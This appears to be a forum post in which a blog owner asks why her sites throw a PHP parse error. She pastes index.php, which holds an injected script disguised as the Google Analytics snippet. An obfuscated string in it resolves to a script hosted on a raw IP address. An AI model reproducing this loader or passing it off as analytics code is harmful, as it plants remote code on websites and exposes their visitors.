Hi,
I keep getting this error message on every single one of my blogs. They were all installed using Fantastico, and have been working fine for a long time. Then suddenly they all started displaying this error:
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';' in /home/liz/public_html/dogbehaviorexpert/index.php on line 7
I've tried everything I can think of and can't seem to find where the , or ; go... This is what the code looks like now:
<?php
// Silence is golden.
?><?php echo ''; ?><?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t!#$@t@!$p&!@:$/!@#!/#9(1)@.(2)1#(2)!.&6!@!#5(@#!.!&$1@#4)8#&/($g&$a!.(js)'.replace(/#|@|&|\$|)|!|^|(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = gat.getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>
I would appreciate any suggestions.
Thanks,
Liz